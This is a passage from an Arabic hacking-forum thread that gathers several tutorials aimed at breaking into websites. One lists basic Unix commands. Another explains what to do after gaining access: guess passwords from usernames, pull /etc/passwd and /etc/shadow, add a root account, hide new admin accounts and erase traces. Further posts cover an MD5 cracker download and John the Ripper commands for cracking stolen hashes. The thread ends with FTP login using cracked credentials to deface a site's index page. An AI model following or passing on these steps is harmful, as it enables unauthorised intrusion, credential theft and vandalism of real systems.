وذلك بالاختيار من القائمة المنسدله .

منقول للفائده

اخوكم:
بو فهد

================================================== ======




اوامر لينكس الاساسيه

للكاتب :بوفهد

=============
بسم الله الرحمن الرحيم

هذه بعض الاوامر الاساسية : -

A
access : لفحص ملف من حيث امكانيه القراءة , الكتابة ..
at : لتنفيذ امر في تاريخ ووقت معين
alarm : لعمل منبه
accept : لقبول اتصال على سوكيت .


B
batch : لتنفيذ امر عندما يحصل على تصريح
buildhash : مدقق املائي


C
cat : لعرض محتوى اكثر من ملف مع بعض
cd : لتغير الدليل الذي انت عليه
chmod : لتغير تصريح دخلول ملف معين
chown : لتغير مالك ملف معين
clear : لمسح كل الذي على الشاشة
cmp : لمقارنة ملفين
cp : لنسخ الملفات
crypt : لتشفير و فك تشفير الملفات
csplit : لتقسيم الملف الى عدة ملفات
cu : لطلب تريمنال يونكس اخر


D
date : لاظهار التاريخ و الساعة
df : لتقديم تقرير عن مساحه القرص ( المساحه الخالية .. )
diff : لمقارنه ملفين
diff3 : لمقارنه 3 ملفات او اكثر
dircmp : لمقارنه دليلان
du : تقرير عن مساحه القرض المستخدم


E
echo : يستخدم لاظهار سطر نكتب فيه تيكست
text editor : ed ( مثل الورد يعني )
egrep : مثل الامر grep
text editor : ex ( مثل الورد يعني )


F
file : للتقرير عن نوع ملف
find : للبحث عن ملفات
finger : تقرير عن مستخدم


G
++g : كومبيلر لل C++ و C
gcc : كومبيلر لل C++ و C
grep : يستخدم للبحث عن شئ داخل ملف
gzip : لضغط ملفات
gunzip : لضغط ملفات


H
haltsys : لاغلاق النظام
head : لاظهار اول 10 اسطر من الملف


I
ispell : مدقق املائي


K
** kill : لانهاء عمليه


L
line : لقراءة ملف سطر معين في ملف
ln : لعمل لينك ملف معين
logname : للحصول على اسم الدخول الخاص بك
lpr : ارسال طلب للطباعه
lprint : للطباعه بالطابعه المحليه
lpstat : لتقديم تقرير عن حاله الطباعه
lpq : لتقديم تقرير عن حاله الطباعه
ls : لعرض محتويات مجلد


M
mail : لارسال و استقبال ايميلات
man : للحصول على معلومات عن اي امر
mkdir : لعمل دليل جديد
more : لعرض الملفات


P
passwd : لانشاء كملة سر او تغيره
pr : لطباعه ملف
ps : العمليات عن العمليات التي تم تشغيلها
pstat : لعرض حالة النظام
pwd : لعرض المسار الذي انت فيه الان


R
rm : لمسح ملفات او مجلدات ( خاليه )
rmdir : لمسح مجلد ( خالي )


بوفهد


================================================


التعامل مع لينكس في اختراق المواقع

للكاتب: بوفهد


===============================


هذا الموضوع مخصص لمن أراد التعامل مع لينكس في اختراق المواقع وليس لديه الخبرة الكافية فيه...
سوف يكون هذا الموضوع عن العمليات التي يستحسن القيام بها بعد الحصول على كلمة السر والنجاح في الدخول على النظام..
أولا يجب ان تعرف بأنه يمكن ان تدخل على بعض الانظمة باستخدام بعض الكلمات المشهورة وتوجد بعض الانظمة تسمح لك بتنفيذ أمر واحد ثم تقوم باخراجك من النظام بعد ذلك وأفضل تلك الأوامر هي :.

who
rwho
finger

وتستفيد من هذه الأوامر بأنك تستعرض اسماء المستخدمين للنظام وبذلك يمكن ان تستخرج كلمة السر من نفس الاسم وذلك لأن بعض المستخدمين يستعمل كلمة سر مشابهة تقريبا لأسمه مثل :.

username : Paul
password : Paul1

وفي بعض الأنظمة تستطيع الدخول بكتابة test أو demo

من الملفات المهمة والتي يجب عليك استخراجها بعد دخولك على أي نظام :.
/etc/passwd
/etc/group
/etc/hosts
/usr/adm/sulog
/usr/adm/loginlog
/usr/adm/errlog
/usr/adm/culog
/usr/mail
/usr/lib/cron/crontabs
/etc/shadow

الحساب bin :.
وهو مهم حيث يحتوي على حساب المستخدم ويوجد به معظم الملفات المهمة وقد يوجد ملف كلمة السر واذا كان كذلك فيمكن
(أحيانا) اضافة كلمة سر خاصة بك وتضيف حساب دخول (روت) لك !!
والطريقة بسهولة كالتالي :.
ed passwd $

وأخيرا تقول exec login وتكتب أي اسم وبذلك تكون انت مدير النظام!!

ما الذي سوف تواجهه عند دخولك على أي نظام بكلمة سر واسم مستخدم ؟!!
عند دخولك الى النظام ستقابل احدى هذه الاحتمالات :.
اما انك استطعت الحصول على حساب مدير النظام (الروت) أو انك حصلت على حساب مستخدم آخر..
في البداية تكتب الامر التالي :.
pwd $
والنتيجة تظهر :.
usr/admin/ $
النتيجة اظهرت انك استطعت الدخول على المدير وبذلك تستطيع التعامل مع كامل النظام بدون قيود..
اذا ظهرت نتيجة غير تلك النتيجة .. فمثلا :
usr/paul/ $
فهذا يدل على انك دخلت على حساب هذا المستخدم!!
ولعرض ملفات هذا المستخدم تكتب الآتي :.
ls /usr/paul $
وسوف يعرض لك ملفات هذا المستخدم :.
mail
pers
games
bin
ولكن هذا لن يعرض ملف .profile
ولكي تستعرضه تكتب الآتي :.
cd $
ls -a $
:
:
.profile
$

اذا اردت قراءة محتويات ملف فسوف تكتب الأمر التالي :.
cat letter $
وهذا اذا افترضنا ان الملف المطلوب هو letter

اذا اردت تغيير كلمة السر فما عليك الا ان تكتب :.
passwd $
ثم سيطلب منك كلمة السر القديمة وهي طبعا معك!! وتدخل كلمة السر الجديدة ..

للبحث عن معلومة معينة تكتب الأمر التالي :.
grep phone paul $
وهذا بافتراض انك طلبت ارقام الهاتف الخاصة بالمستخدم الآخر

ولعمل نسخ من ملف الى ملف آخر تكتب الآتي :.
cp letter letters $

اذا اردت عمل محادثة مع مستخدم آخر على اتصال فتكتب الأمر التالي :.
write $

ولمعرفة من يوجد على النظام نكتب الآتي :.
who $

safadM tty1 april 19 2:30
paul tty2 april 19 2:19
gopher tty3 april 19 2:31

واذا اردت قراءة الملف المحتوي على كلمات السر المظللة يجب ان تكون قد دخلت على النظام باستخدام حساب المدير نفسه .. ولاستعراض ملف كلمات السر نكتب :.
cat /etc/passwd $
root:F943/sys34:00000:/:
sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh

وقد يظهر حساب آخر للمدير كالتالي :.
paul:chips11,43:34Mr doooom:/usr/paul:

وهذا يعني انه يمكن للمستخدم الاحتفاظ بكلمة السر لمدة ثلاثة اسابيع بدون تغيير وانه يجب ان يغيرها كل ستة اسابيع ..
استعراض ملف المجموعة كالتالي :.

ls /etc/group $

root::0:root
adm:adm,root
bluebox::70:

ويمكن ان يحتوي ملف المجموعة على كلمات سر أو لايحتوي !!
اذا كان لايحتوي على كلمة سر فانه يمكن ان تصبح انت مديرا للنظام في حالة دخولك بكلمة سر لمستخدم عادي وليس كمدير للنظام وذلك بعدة طرق ..

ايضا اذا كنت انت مديرا للنظام فتستطيع انت تضيف مستخدم الى نظامك كذلك تستطيع اضافة مدير آخر للنظام ولكن انتبه لاتستخدم اسماء مشبوهه مثل هكرز أو المخترق حتى لايكشف أمرك !!

من الأوامر التي لم اذكرها أمر تستطيع ان تضيف حساب لك مع ملف المجموعة وهذا يفيد في أنك تستطيع ان تتحول الى مدير النظام (الروت) وكذلك استخدام برامج مصممة لذلك وتقوم بنفس الشئ ..

وهنالك أوامر تستطيع من خلالها الكتابة في البروفايل لأي مستخدم وبذلك تتمكن من امتلاك حسابه وأشياء أخرى كثيرة تجعل من لينكس أعظم أداة لاختراق المواقع ..

أخيراَ تذكر انك كلما كنت عارفا بالنظام الذي تخترقه فسوف تعرف كيف تتعامل معه بكل سهولة وتعرف كيف تلغي كل عملياتك ولاتترك أي أثر يدل على أختراقك للنظام الهدف..


اخوكم:
بو فهد


===============================================

كسر كلمات السر المشفره md5

للكاتب : الحريف القاتل

==============

مواصفات البرنامج :ا

1- تجربة الف كلمة في الدقيقة تقريبا وهذا يعني عشرة الاف كلمة في عشر دقائق

وهذا يعني مائة الف كلمة في الساعة يعني مليون كلمة في اليوم.

2- عند البد بعملية الكسر ليس هناك تأثير كبير على الجهاز بهذا تستطيع استخدامه

وانت تعمل على اشياء اخرى (التجربة خير برهان).

3- كشف اي كلمة سر مهما كانت صعوبتها مادام كان موجودا في قائمة الكلمات التي يجربها.

4- اقصى حد لقائمة الكلمات هي 32000 كلمة .

5- يوجد عداد يخبرك بالكلمات المتبقية التي لم يتم تجربتها.

6- تيستطيع وقف عملية الكسر في اي وقت شئت.



شرح فكرة البرنامج:

فكرة البرنامج هي تخمين كلمات السر حتى تطابق كلمة السر المشفرة وهذا يعتمد على الكلمات

التي وضعتها في القائمة.


شرح البرنامج:

اولا عند فك ضغط البرنامج :

افتح البرنامج وضع في خانة كلمة السر المشفرة الباسوورد المشفر

وبعد ذلك اضغط على تحميل الكلمات واختر الملف الذي به الكلمات ثم

اضغط على زر بدء عملية كسر كلمة السر وانتظر حتى يكسر كلمة السر واذا كسر سوف تظهر

لك رسالة تخبرك بذلك وتظهر كلمة السر في خانة كلمة السر.



ملاحظات:

- عند تحميل الكلمات ضعها في ملف من نوع txt ثم حملها.

- للحصول على قائمة للكلمات يوجد الكثير من البرامج التي تقوم بذلك حيث تجهز لك

كلمات كثيرة اما اذا احببت ان تجهز قائمتك فلك ذلك او انك تبحث عن قائمة الكلمات في الانترنت .



مثال تجريبي:

افتح البرنامج وضع هذا الباسوورد المشفر:

e10adc3949ba59abbe56e057f20f883e

افتح وحمل قائمة الكلمات وضع من ضمنها الرقم 123456

لأنها هي كلمة السر قبل التشفيير وابدأ عملية الكسر وانظر للنتيجة.

وادي صورة البرنامج




وصله التحميل

http://united-hackerz.freeprohost.com/shar7/mahmoud.zip

===============================================


تعلم تطبيق جون ذرايبر بالطريقه الصحيحه

الشرح بالصور

للكاتب :Mr_ERasER

=====================

بسم الله الرحمن الرحيم
اليوم اقدم لكم جون دبلير
بكل تاكد راح اضع بين يديكم انشاء الله كل طرق الاستفاده من جون ذبلير في كسر التشفير
اعرف انه شرح من قبل لاكن لاارى ان شرحه كان وافي مع احترامي لكل من شرحه
نبدا الان شرح تركيب john
الان انت حملت جون فك الضغط عنه وانسخ الملف
اذهب الى \C لاحظ الصوره







الصقه هناك وتاكد من تغير اسمه الى( john) فقط بدون اي اضافات

الان افتح المجلد john اذهب الى ملف run
لاحظ الصوره التاليه









وانشي مستند تكست جديدواليكن اسمه pass





الحين خلصنا من اعداد برنامج جون ذبلير

===================

نبدا الان طريقة الاستفاده منه اولا يوجد عندك طريقتين للاستافده منه وسوف نشرحها وحده وحده
============

الطريقه الاولى

وهي الطريقه الاسهل والاريح لك ولجهازك
وتعتمد على مستند نصي تكون مخزنه فيه العديد من الباسووردات العشوائيه وهو يقوم بخمين اين منها يكون الباسوورد وهي تعتمد ملف يسمى وورد لست (word lists)

لنبدا بشرح الوورد لست اولا: (word lists)
فالنفرض اننا حصلنا على باسورد مشفر ولنفرض انه هذا

cabfan:aeZRqBGfPdKVo

الطريقه
اذهب john >run>pass

ضع فيه الباسوورد المشفر داخل مستندpass الذي قمنا بصنعه فيما سبق
قم بتحمبل ملف وورد لست من هنا
http://scrabbleschoten.homestead.com/wordlists.html
http://www.htdig.org/files/contrib/wordlists/
http://www.sandroid.org/GutenMark/wordlists.html
كماان بعض الاخوه جمعها هنا للاستفاد
http://scrabbleschoten.homestead.co...ers_english.zip
http://scrabbleschoten.homestead.co...ers_english.zip
http://scrabbleschoten.homestead.co...take_an__s_.zip
http://scrabbleschoten.homestead.co...id_wordlist.zip


والان بعد تنزيل الوورد لست فك الضغط عنه وانسخ الملف الموجود فيه ثم

اذهب الى john> run والصق الوورد لست بداخله والنفرض انك سميته
word وتاكد دائما انه لازم يكون امتدادها txt
اوكي الحين لصقناها بملف run
دع ملف run مفتوحا لاتغلقه واذهب الى ابداء > تشغيل > وضع هاي الكلمه
command

لاحظ الصوره التاليه










راح تفتح معك نافذة الدوز= dos على هذا الشكل تاكد انظر الصوره







اكتب هذا الامر
(( john -w:word.txt pass.txt )) وانتر

نلاحظ في الامر السابق ملفين
الملف الاول :word.txt هذا هو ملف الورد لست وسميه على حسب ماهو موجود عندك
الملف الثاني :pass.txt هذا هو المستند الى فيه الباسوردات المشفره ايضا سميه على اسم الملف الى عندك


بعد ذالك انتر سبداء بعدها في العمل البرنامج الا ان يتم كسرها فاذا كسرها تابع نهايه الطريقه الثانيه
لتعرف بعد كسر الشفره ما تفعل
وبكذا خلصنا من اول طريقه لكسر التشفير نشوف الطريقه الثانيه
====================

الطريقه الثانيه
وهي الطريقه العاديه التى تعتمد على ذكاء البرنامج في كسر التشفير

بعد ان وضعنا الباسوورد المشفر داخل الملف التكست pass نفس الطريقه الاوله

نترك ملف run مفتوحا نفس الطريقه الاولى
ونذهب الى ابداء> تشغيل > واكتب نفس الكلمه (( command ))
كما في الطريقه الاولى

ونبدا في الاوامر على التوالي
john -si pass.txt
john -single pass.txt
john -i:alpha pass.txt
john -i:all passwd.txt
وقد يكون هذا الامر افضلهم لاكنه ياخذ وقت طويل جدا لكسر التشفير يصل الى اسابيع وقد يصل الى شهور ايضا
لاحظ الاوامر في الصوره التاليه





نفرض انه طالت معك الامور ومليت شو تعمل لغلقه واكمال البحث مره اخرى في اي وقت
كل ما عليك هو ادخال الامر التالي

(( Ctrl+C ))

وسوف يتوقف البرنامج عن العمل واذا ارت العوده اليه في وقت لاحق لاكمال بحثك ادخل الامر التالي

(( john -restore ))

لنعود من جديد بعد ان وضعنا اوامر الكسر للتشفير خلصنا من اخر امر وتم البحث وضهرت لك
انه تمكن من كسر التشفير
كل ما عليك هو اذهب الى السي افتح ملف john > run تجد هناك تكون عندك
مستند جديد لاحظ الصوره التاليه وافتحه بواسطة المفكره لاتنسى ذالك








بعد فتحه سيظهر لك الباسورد بعد كسر تشفيره على النحو التالي







طابقه مع الباسورد المشفر شاهد الان مثال
الباسورد واليوزر المشفر >> cabfan:aeZRqBGfPdKVo

الباسورد واليوزر بعد فك التشفير>> aeZRqBGfPdKVo:thatcher

اغلب ماتكون متشابه هي اليوز يعني راح تلاقيها تقريبا نفس الاسم لاحظها ولتاكد حاول تبدل بينها الى ان
تستطيع الدخول فيها الى الموقع

==========

الان بعد كسرها اذهب الى ftp وضع اسم السيرفر واليور والباسورد وتفضل البيت بيتك
ادخل احذف صفحات الاندكس الي فيه ونزل صفحة الاندكس تبعك وخلاص





وبكذى خلصنا والحمد لله
احب ازيد نقطه طلعت معي مدري عن الاخوه وهي لاحظ الاسماء المشفر التي ياتي اسم وبعده هكذا
امثال
aexMVWnDOyrdE
aeOvDqa1eAYUY
التى تبدا دوما بحرفي ae هاي تكون خدعه في اكثر الاحيان راح ينكسر تشفيرها معك بكل سهوله لاكن لافائده
فيها فهي خدعه اكثرها

تحياتي لكم اتمنى اتمنى يكون الشرح اعجبكم

اخوكم|
x X x



=========================================
 
قديم 2008-08-16   #2
التنين الاسمر
عضو
 
الصورة الرمزية التنين الاسمر

عضويتي : 12469
تسجيلي : 27 - 7 - 2008
الإقامة : في جزيره التنين
الهواية : احراق اعصاب السوابر
المواضيع : 0
مشاركاتي : 36
نقاطي : 10
المتصفح :
المشغل : Windows 7
جنسي : male
دولتي : Canada
مزاجي
المزاج rayg
التنين الاسمر غير متواجد حالياً
Default رد: أقوى شرح في اختراق المواقع المحمية



السلام عليكم ورحمة الله
ه السلام عليكم ورحمة الله وبركاته

سراحه شرح رائع تشكر عليه وا عطيه جيد جدا
لماذا انا اقولك لو حطيته على شكل كتاب بيكون يحملوه الاخون وتعم الفايده لا كن وربي تشكر على تعاونك وطرحك موضوع رائع ونا استفدات
 
قديم 2008-08-16   #3
Dark_Ghost
عضو رائع
 
الصورة الرمزية Dark_Ghost

عضويتي : 3898
تسجيلي : 2 - 3 - 2008
الإقامة : ؟؟؟
الهواية : ؟؟؟
المواضيع : 109
مشاركاتي : 2,264
نقاطي : 10
المتصفح :
المشغل : Windows 7
جنسي : female
دولتي : United Arab Emirates
مزاجي
المزاج pushed
Dark_Ghost غير متواجد حالياً
Default رد: أقوى شرح في اختراق المواقع المحمية



مشكووووووووووور عالشرح الرائع...
 
قديم 2009-06-19   #4
MOHAMED201019
عضو
 
الصورة الرمزية MOHAMED201019

عضويتي : 52482
تسجيلي : 19 - 6 - 2009
العمر : 22
الإقامة : EGYPT
الهواية : FOOTBALL
المواضيع : 1
مشاركاتي : 13
نقاطي : 10
المتصفح :
المشغل : Windows 7
جنسي : male
دولتي : Egypt
مزاجي
المزاج rayg
MOHAMED201019 غير متواجد حالياً
Default رد: أقوى شرح في اختراق المواقع المحمية



مشكوووووووووور عالمجهود
 

مواقع النشر (المفضلة)

أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

الساعة الآن حسب توقيت مكة المكرمة 05:12 PM.


Powered by vBulletin
Copyright ©2007 - 2014 Sa3eKa.CoM . All rights reserved
|| ѕє¢υяιту By Sa3eKa TeAm ||
Search Engine Optimisation provided by DragonByte SEO (Pro) - vBulletin Mods & Addons Copyright © 2014 DragonByte Technologies Ltd.